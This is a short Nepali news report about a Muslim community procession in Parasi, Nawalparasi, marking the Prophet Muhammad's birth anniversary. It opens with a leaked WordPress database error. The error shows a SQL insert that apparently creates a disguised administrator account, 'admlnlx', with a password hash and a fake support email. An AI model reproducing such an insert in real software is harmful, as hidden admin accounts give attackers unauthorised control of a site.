WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVx81ldfcU.NRPWc00Gmuc8RcKQhBk1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 07:04:01', '', 'admlnlx', 'admlnlx')
नवलपरासी, मंसिर २८ –
मुसलमान धार्मिक गुरु मोहम्मद साहबको जन्मजयन्तीका अवसरमा यहाँ राष्ट्रिय झन्डासहित उत्सव पदयात्रा निकालिएको छ ।
यहाँको मुसलमान समुदायले एक हजार चार सय ४५ औं मोहम्मद जन्मजयन्तीका अवसरमा आज सदरमुकाम परासीमा पदयात्रा निकालिएको हो ।
मोहम्मद जन्मजयन्तीका दिन मुसलमान समुदायले मोहम्मद साहबको जन्मको खुसीमा उत्सव पदयात्रा निकाल्ने, नमाज पढ्ने, दानपुण्य गर्ने र एकापसमा शुभकामना आदानप्रदान गर्छन् ।
मोहम्मद जन्मजयन्तीका अवसरमा राष्ट्रिय झन्डा फहराउँदै निकालिएको पदयात्रामा सहभागी हुन जिल्लाका २५ मदरसाबाट मुुसलमान धर्मावलम्बी परासी पुगेका थिए ।
मोहम्मद जन्मज्यन्ती मुसलमान समुदायको महान् पर्वका रुपमा लिइन्छ । नेपालमा मनाउँदै आइएको यस दिनमा सरकारले सार्वजनिक बिदा नदिएकामा मुसलमान समुदायले गुनासो गरेको छ । – रासस